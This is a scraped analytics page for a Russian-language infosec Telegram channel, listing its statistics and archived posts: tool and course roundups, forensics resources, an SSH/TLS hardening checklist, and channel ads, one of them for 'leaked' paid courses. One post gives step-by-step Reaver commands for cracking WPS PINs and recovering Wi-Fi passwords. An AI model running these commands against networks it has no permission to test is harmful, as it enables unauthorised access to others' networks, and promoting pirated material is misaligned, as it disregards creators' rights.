uz
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

Yopiq kanal

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Ko'proq ko'rsatish

📈 Telegram kanali CodeGuard: PySec Edition analitikasi

CodeGuard: PySec Edition kanali faol ishtirokchi. Hozirda hamjamiyat 14 097 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 760-o'rinni va Rossiya mintaqasida 45 869-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 14 097 obunachiga ega bo‘ldi.

26 Sentabr, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 821 ga, so‘nggi 24 soatda esa 0 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

  • Tasdiqlash holati: Tasdiqlanmagan
  • Jalb etish (ER): Auditoriya o‘rtacha 9.98% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 5.58% ini tashkil etuvchi reaksiyalarni to‘playdi.
  • Post qamrovi: Har bir post o‘rtacha 1 407 marta ko‘riladi; birinchi sutkada odatda 786 ta ko‘rish yig‘iladi.
  • Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 8 ta reaksiya keladi.
  • Tematik yo‘nalishlar: Kontent codeguard, pysec, docker, grep, контейнер kabi asosiy mavzularga jamlangan.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

Yuqori yangilanish chastotasi (oxirgi ma’lumot 27 Sentabr, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

14 097
Obunachilar
Ma'lumot yo'q24 soatlar
+2477 kun
+82130 kun
Postlar arxiv
😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории «~» Шедевро-репозиторий представляет собой живую подбо
😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории
«~» Шедевро-репозиторий представляет собой живую подборку из нескольких сотен бесплатных комнат TryHackMe, разложенных по удобным разделам с разными уровнями и темами
📌 Какие разделы есть внутри:
🎥 Fundamentals: вводные комнаты, Linux/Windows‑база, принципы безопасности, первые пентест‑сценарии 🎥 Тематические ветки: Recon, Scripting, Web, Forensics, Malware Analysis, PrivEsc, Active Directory, PCAP, Buffer Overflow 🎥 CTF‑блоки: CTF всех уровней + спец‑ивенты вроде Advent of Cyber, чтобы качать навык решения задач под разным уровнем боли в пятой точке
🤩 Репозиторий удобно использовать как чек‑лист для обучения кибербезу — отметили, что уже прошли, выбрали следующую тему, закрепили практикой на TryHackMe без бесконечного скролла каталога комнат. Все просто 😏 😈 CodeGuard: PySec Edition | Чат

⚡️⚠️📊Сделал подборку рекомендую вам ознакомьтесь 🤙 • Арсенал Безопасника — Лучшие инструменты для хакинга и OSINT • Хакер | Red Team — Библиотека Хакера тут вы найдете только эксклюзив! Автор делится лучшим. (новинка) • Max Open Source — Полезные статьи и бесплатные курсы по этическому хакингу, пентесту, программированию и информационным технологиям. • IT MEGA — Тут эксклюзивные материалы, курсы по программированию, информационная безопасность хакингу, Osint и IT. • Книги | Books — Одна из крупных библиотек в сегменте Telegram. Тысячи книг и полезного материала. • Библиотека Cobalt Strike — Все для знакомства с хакингом, пентестом, эксклюзивной информация, курсы, книги, статьи и инструменты. • Журнал Хакер — Журнал хакер, канал архив, все выпуски с 1999- до последнего! Удивительный мир! • Библиотека разведчика Osint — Единственная в своем роде библиотека по теме OSINT, разведки в сети, сбору информации, технологии конкурентной разведки, поиск о цели. ‼️ В общей сложности, данные проекты насчитывают терабайты курсов и книг. Присоединяйся 📲💻

🧬 Linux-форензика: с чего нужно начать разбор системы? — Собрал для вас мини‑подборку по Linux‑форензике со шпаргалками кома
🧬 Linux-форензика: с чего нужно начать разбор системы? — Собрал для вас мини‑подборку по Linux‑форензике со шпаргалками команд, тулкитами и утилитами для живого анализа и последующего разбора образов 💬 Шпаргалки и методички:
1️⃣ Linux Command Line Forensics and Intrusion Detection — Набор базовых команд для быстрого осмотра живой Linux‑системы: процессы, сетевые соединения, пользователи, cron, бинарники, логи 2️⃣ Linux Forensics Cheatsheet — Краткие сводки по основным артефактам: auth‑логи, системные журналы, history, bashrc, SSH‑ключи, cron, временные файлы 3️⃣ Linux Forensic Artifact Cheatsheet — Шпаргалка с фокусом на артефакты и инструменты: LiME и AVML для дампа памяти, Volatility и Rekall для анализа, Sleuth Kit и Autopsy для дисков, Plaso и log2timeline для таймлайнов
👁️ Инструменты и дистрибутивы:
4️⃣ LiME и AVML — LiME и AVML позволяют аккуратно снять дамп RAM с Linux‑системы, чтобы потом разбирать его 5️⃣ Volatility и Rekall — Фреймворки для работы с дампами: процессы, модули ядра, скрытые процессы, сетевые сессии, артефакты малвари 6️⃣ The Sleuth Kit — Набор утилит и GUI‑оболочка для анализа образов дисков: файловые системы, удалённые файлы, метаданные, временные метки, артефакты браузера и пользователя 7️⃣ Plaso — Инструмент, который собирает события из логов, файловой системы и артефактов в единый временной ряд
🤡 Живой IR и автоматизация
8️⃣ Linux live forensics — Практические разборы инцидентов на живых Linux‑серверах: какие данные собирать в первые минуты, чем это грозит для целостности артефактов и как автоматизировать сбор 9️⃣ LINReS — Open source‑скрипт под live‑IR: собирает volatile и non‑volatile данные с подозрительного хоста и отправляет их на форензик‑станцию по заранее поднятым каналам
Набираем 15 реакций и я дропаю минимальный чек‑лист по теме «Что сделать в первые 10–15 минут на скомпрометированном Linux‑хосте» с конкретными командами 🔑 😈 CodeGuard: PySec Edition | Чат

🧠 С ЭТИМ САЙТОМ ТЫ СОВЕРШЕННО БЕСПЛАТНО ПРОЙДЕШЬ ВСЮ БАЗУ ПО ИИ И РАБОТЕ С ДАННЫМИ 🫶 Что это за чудо такое? 🎥 Cognitive Cl
🧠 С ЭТИМ САЙТОМ ТЫ СОВЕРШЕННО БЕСПЛАТНО ПРОЙДЕШЬ ВСЮ БАЗУ ПО ИИ И РАБОТЕ С ДАННЫМИ 🫶 Что это за чудо такое? 🎥 Cognitive Class — образовательная платформа от IBM с сотней бесплатных курсов и проектов по искусственному интеллекту, data science и облачным технологиям и смежным темам 📚 Темы, которые закрывает платформа:
— Базовый и продвинутый data science: Python, анализ данных, визуализация, машинное обучение, работа с реальными датасетами — ИИ и ML: вводные по AI, классические алгоритмы, нейросети, NLP, компьютерное зрение — Облака и big data: основы cloud‑вычислений, работа с Hadoop и Spark, построение решений в облаке
📎 Отдельный плюс: За прохождение многих треков можно получить сертификаты и бейджи, которые удобно прикладывать к резюме и профилю 😈 CodeGuard: PySec Edition | Чат

☄️В преддверии Нового года айтишник из “Matrix” скупил все курсы топовых IT-школ и выложил 5 ТБ слитых курсов к себе в каналы
☄️В преддверии Нового года айтишник из “Matrix” скупил все курсы топовых IT-школ и выложил 5 ТБ слитых курсов к себе в каналы! 👩‍💻 Python: https://t.me/+kBPlIQ1kpHw0YmQy 👩‍💻 Все ЯП: https://t.me/+pkvOZc3g5gU3YTEy 👩‍💻 Backend: https://t.me/+QRq_LSpodJ80NjE6 📱 Frontend и Web: https://t.me/+jOItOzJamrNhOTIy 👩‍💻 Графика и дизайн: https://t.me/+lxe3X0QQXVk2NWIy Все материалы в закрепе и постоянно пополняются👆

🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд «~» WPS — это удобная настройка Wi‑Fi по кнопке или пину,
🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд
«~» WPS — это удобная настройка Wi‑Fi по кнопке или пину, которая сильно упрощает жизнь пользователю, но делает сеть уязвимой для перебора. В статье по ссылке говорится как правильно провести этот самый перебор. Делюсь своим опытом, как я организовывал подобную атаку по данному материалу
🤩 Шаг 1. Готовим карту и систему: Нам понадобится карта с режимом монитора и инъекциями (Atheros часто ведёт себя лучше всего с Reaver) — Отключаем всё лишнее:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
— Смотрим интерфейс:
sudo iw dev
— Переводим wlan0 в монитор‑режим:
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
🔍 Шаг 2. Ищем точки с включённым WPS: Для разведки возьмем wash (идёт в комплекте с Reaver)
sudo wash -i wlan0
— Ждем пару минут и смотрим колонки: 🎥 BSSID – MAC точки 🎥 Ch – канал 🎥 WPS – версия WPS 🎥 Lck – блокировка WPS (No — интересует, Yes — можно пройти мимо) 🎥 ESSID – имя сети (Для атаки подойдут только те, у кого Lck = No) 💀 Шаг 3. Проверим Pixie Dust через Reaver: Если точка уязвима к Pixie Dust, PIN можно вытащить почти сразу, без долгого онлайнового перебора — Берем BSSID из вывода wash, например:
EE:43:F6:CF:C3:08
— Запускаем проверку:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -K
— Если роутер уязвим, Reaver покажет PIN вида:
WPS pin: 36158805
(На этом этапе у нас есть PIN, но все ещё нет WPA‑пароля) 👾 Шаг 4. Полный перебор WPS PIN, если Pixie не зашёл: Если Pixie Dust не сработал и PIN’ы не подошли, остаётся классический перебор:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -vv
— Ключи -v/-vv/-vvv увеличивают подробность вывода и помогают понять, на чём всё ломается >> За счёт уязвимости протокола WPS реальное пространство перебора — всего около 11 000 комбинаций, а не десятки миллионов, поэтому это задача на пару часов для опытных спецов 🤲 Шаг 5. Если у нас уже есть PIN, то достаем WPA‑пароль: Если PIN уже известен, можно попросить Reaver вытащить WPA‑пароль напрямую:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805 -vv
— В успешном сценарии на выходе получаю строку с PSK: это и есть пароль от Wi‑Fi 🛡 Как наоборот защититься от атак? >> С точки зрения защиты единственный надёжный шаг, это отключить WPS с PIN в настройках роутера. Если производитель позволяет, плюсом включить блокировку WPS 😈 CodeGuard: PySec Edition | Чат

👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидент
👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидентами — Разработан под тех, кто хочет уметь не только ловить алерты, но и разруливать последствия для бизнеса, даже когда ресурсов и людей минимум 🌐 Что разберёте на курсе:
— Как выстраивать процесс реагирования от обнаружения атаки и разбора логов до ликвидации и пост‑анализа — Как работать с киберрисками: выявлять активы и уязвимости, оценивать влияние инцидента на бизнес, выбирать, какие риски можно реально снижать, а какие наоборот осознанно принимать — Как использовать open source‑инструменты и простые практики, когда SIEM за миллионы не завезли, а инциденты уже есть
💡 Также приятно то, что упор сделан на реальные кейсы и разбор типовых факапов: ошибки в коммуникации, неправильную приоритизацию, отсутствие плана IRP и документации — все то, что в жизни ломается куда чаще, чем сами технологии. ➡️ Забрать курс 😈 CodeGuard: PySec Edition | Чат

Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня. Можешь выбрать сам: 🤖 AI — @ai_prompt
Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня. Можешь выбрать сам: 🤖 AI — @ai_prompt 📱 Нейросети — @neuro_prompt 📱 Python — @python_prompt 🤔 InfoSec — @infosec_prompt 👩‍💻 IT Новости — @it_news 😄 IT Мемы — @it_memes Обучение, правильные промпты, разборы и полезные ресурсы на каждую тему!

Делаем новинку?
Anonymous voting

Готовлю новый канал CodeGuard: Academy Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе се
+1
Готовлю новый канал CodeGuard: Academy Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе секунда, а мне мотивация пилить контент. 👉 https://t.me/+XI5KQ-XdAow3YWMy 😈 CodeGuard: PySec Edition | Чат

🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки
🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки в процессах безопасности
Книга показывает, почему даже идеально настроенный периметр бессилен, если сотрудники сами выдают доступы, кликают по ссылкам и доверяют админам по телефону
🌟 Что внутри книги? — Психология атак: какие триггеры используют социнженеры и как из них собираются сценарии фишинга — Практический OSINT и подготовка атак, как по открытым источникам собрать досье на компанию и людей — Этичный пентест людей: структуры фишинговых кампаний + рекомендации, как результаты таких тестов превращать в обучение 💡 Чем так хороша эта книга? >> Она является хорошим мостом между технарями и человеческим периметром. После прочтения книги проще объяснить бизнесу, почему защиты от людей нужны не меньше, чем новый firewall 📕 Ссылка на книгу как всегда в нашем архиве — [ARCHIVE] 😈 CodeGuard: PySec Edition | Чат

⚠️ Git: мини-шпаргалка по жизненному циклу изменений 1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете в
⚠️ Git: мини-шпаргалка по жизненному циклу изменений 1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете всё, что можно —git add: нужен, чтобы перенести выбранные изменения в подготовительную область 2️⃣ Staging: Снимок того, что пойдёт в следующий коммит —git commit: зафиксировать содержимое staging в локальном репозитории 3️⃣ Local Repository: История всех ваших коммитов на машине —git push: отправить локальные коммиты на сервер —git fetch: забрать новые коммиты с сервера без слияния —git pull – fetch + авто‑слияние в текущую ветку 5️⃣ Stash: Когда нужно убрать со стола, но ещё рано коммитить — git stash: спрятать незакоммиченные изменения — git stash apply: вернуть изменения, не очищая stash — git stash pop: вернуть и одновременно удалить запись из stash 5️⃣ Remote Repository — Общий репо проекта на GitHub / GitLab / Bitbucket, куда пушит вся команда 😈 CodeGuard: PySec Edition | Чат

🥷 Стажировки и вакансии по ИБ и OSINT - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @
🥷 Стажировки и вакансии по ИБ и OSINT - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи «~» Теорию про знает каждый второй, а вот тех, кто
🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи
«~» Теорию про знает каждый второй, а вот тех, кто реально открывал конфиг и бил по нему в разы меньше. Подготовил для вас практический чек-лист, который подойдет к любому серверу
1️⃣ Проверяем TLS: что торчит наружу — Быстрый скан протоколов и шифров:
nmap --script ssl-enum-ciphers -p 443 example.com
В выводе смотрим: 🎥 Отключены ли SSLv2/3 и старые TLS 1.0/1.1 🎥 Нет ли древних шифров вроде 3DES/RC4 🎥 Используется ли современный TLS 1.2/1.3 с AES‑GCM или CHACHA20 2️⃣ Смотрим сертификат через openssl
echo QUIT | openssl s_client -connect example.com:443 2>/dev/null \
  | openssl x509 -noout -issuer -dates -subject
— Проверяем кто выдал сертификат, не истёк ли он и корректен ли subject/сан‑имена. Полезно для быстрой диагностики и проверки сторонних сервисов без GUI 3️⃣ Жёстко настраиваем SSH, акцентируем внимание на ключи и современные шифры — Резервная копия и правка конфига:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo nano /etc/ssh/sshd_config
Базовый набор, который стоит включить почти везде:
Protocol 2
PasswordAuthentication no
PermitRootLogin no
ClientAliveInterval 300
ClientAliveCountMax 2
После изменений:
sudo systemctl restart sshd
— Так вы режете логин по паролю, прямой root и вешаете таймаут на вечные зависшие сессии После такого цикла безопасность протоколов начинает ощущаться как осязаемый набор рычагов, за которые можно дёргать самому, пользуемся 😎 😈 CodeGuard: PySec Edition | Чат

🤩 Подборка лучших GitHub-репозиториев для ИБ-специалистов
1) Raccoon — Высокопроизводительный сканер для рекогносцировки: с DNS, портами, веб‑фингерпринтингом, всё в одном CLI 2) BlueTeam-Tools — Собрание инструментов для blue team: мониторинг, лог‑анализ, форензика, DLP, сетевые сенсоры и т.п. 3) Awesome Annual Security Reports — Годовые отчёты по угрозам, инцидентам и трендам от разных компаний 4) OSSEC — Хостовый IDS с мониторингом логов, файловой системой, rootkit‑чекером, алертамм по правилам 5) SafeLine — Высокопроизводительный прокси с встроенным WAF: защита HTTP‑трафика, правила, дашборд, удобный деплой в Docker/K8s. 6) ZAP — Прокси‑сканер приложений: пассивный и активный поиск уязвимостей, фуззинг, API для автоматизации 7) Radare2 и Cutter — Radare 2 это CLI‑фреймворк для анализа бинарей и памяти. Вместе с GUI‑фронтендом Cutter покрывает большую часть задач реверса и отладки 8) Cuckoo Sandbox — Песочница для автоматического запуска подозрительных образцов, имеет настройку поведения, сетевого трафика, артефактов в системе 9) AutoRecon — Фреймворк, который запускает цепочку проверок и раскладывает результаты по папкам 10) pcileech — Инструменты для работы через PCIe/DMA (dump/patch RAM, обход аутентификации и т.п.)
😈 CodeGuard: PySec Edition | Чат

Айтишников в 2025 году больше, чем цыган. И каждый, естественно, хочет быть видным сеньором, свою геймдев-студию, 15.000€ зэпэшечку и больше никогда не выходить на рабочие созвоны. И как быть новичку сегодня? Или айтишнику, решившему сменить сферу деятельности. Бери менторство по ИБ. Кибербезопасность сейчас на подъеме, поэтому даже для ITшника это будет сильное конкурентное преимущество и спидран на буст навыков с нуля. ➦ От корки до корки узнаешь индустрию. Кто много платит и ищет специалистов, какие есть направления. ➦ Получишь все хард и софт скиллы для работы в нише. ➦ Заимеешь переговорные навыки и научишься писать идеальные резюме. Даже если ты уже работаешь в киберсеке, но чувствуешь, что нуждаешься в левел-апе — ю а вэлком. А еще у нас для тебя есть разовые консультации и помощь в составлении резюме. Почитай подробности: https://t.me/+_F4FzzaOTQk2N2Qy

🤨 Burp Suite за 1 час: из хаоса вкладок в рабочий инструмент «•» После просмотра этого видео Burp перестанет выглядеть как с
🤨 Burp Suite за 1 час: из хаоса вкладок в рабочий инструмент
«•» После просмотра этого видео Burp перестанет выглядеть как страшная панель с сотней кнопок и превратится в понятный рабочий инструмент
 🗒 В уроке автор спокойно проходит весь путь работы с ним: — Разбор настройки прокси — Перехват и правка HTTP‑запросов — Наглядная работа с Repeater и Intruder — Обучение поиску уязвимостей на тестовом приложении ➕ Отдельный плюс — автор делает упор на реальные приёмы: где смотреть параметры, как быстро гонять payload’ы и на что обращать внимание при тестировании веб‑приложений 📎 Смотрим и закрепляем свои знания *здесь* 😈 CodeGuard: PySec Edition | Чат

⚠️ Taranis AI — инструмент, превращающий OSINT‑поток в осмысленную ленту, а не в свалку ссылок —> Веб-движок умеет сам ходить
⚠️ Taranis AI — инструмент, превращающий OSINT‑поток в осмысленную ленту, а не в свалку ссылок
—> Веб-движок умеет сам ходить по сайтам и другим открытым источникам, собирать новости и статьи, прогонять их через NLP и вытаскивать из текста сущности и ключевые факты
🔇 Что делает Taranis AI: 1) Агрегирует сырые OSINT‑события в единую ленту 2) Нормализует и обогащает контент через NER, дедупликацию, выделение важных сигналов 3) Поддерживает совместную работу команд и обмен историями через MISP 🔑 Taranis AI отлично подходит как ядро OSINT‑процесса для blue‑team: он берёт на себя рутину сбора и первичной обработки, а аналитик тратит время только на интерпретацию и принятие решений 😈 CodeGuard: PySec Edition | Чат

Изоляция рунета ближе, чем ты думаешь Loading … ██████████████] 99% Роскомнадзору дали карт-бланш на блокировки, а «белые спи
Изоляция рунета ближе, чем ты думаешь
Loading … ██████████████] 99%
Роскомнадзору дали карт-бланш на блокировки, а «белые списки» сайтов тестируют уже в десятках регионов. И гайки будут закручиваться только сильнее. Чтобы в одночасье не лишиться доступа к свободному Интернету, просто сохрани Only Hack. Тут профессиональный хакер делится фишками, с которыми доступ к глобальной сети у тебя будет даже в случае ядерного апокалипсиса. Не жди момента «Х». Перестрахуйся подпиской.

💻 Smap — тихий сканер портов на базе Shodan «~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он б
💻 Smap — тихий сканер портов на базе Shodan
«~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он берёт уже готовые данные у Shodan и собирает по ним картину открытых портов и сервисов, без всяких SYN‑флудов
🔑 ЧТО ОН УМЕЕТ? 1. Drop‑in замена Nmap — Принимает те же ключи -p, -o*, -iL, -h и выдаёт выход в привычных форматах (-oX, -oG, -oN, -oA) 2. До 200 хостов/сек без сканирования сети — По факту мы лишь дергаем бесплатный Shodan API, а Smap отвечает скоростью и не светит ваш IP 3. Версии сервисов и уязвимости — Smap подтягивает баннеры, версии и связанные CVE/теги. В формате -oS можно увидеть уязвимости и метки Shodan 🥸 Помимо nmap‑форматов у него есть и свои:
-oP — список IP:PORT построчно для пайплайнов и других тулов -oJ — JSON -oS — фирменный Smap‑формат с тегами и уязвимостями
⭐️ Ставим Smap себе здесь 😈 CodeGuard: PySec Edition | Чат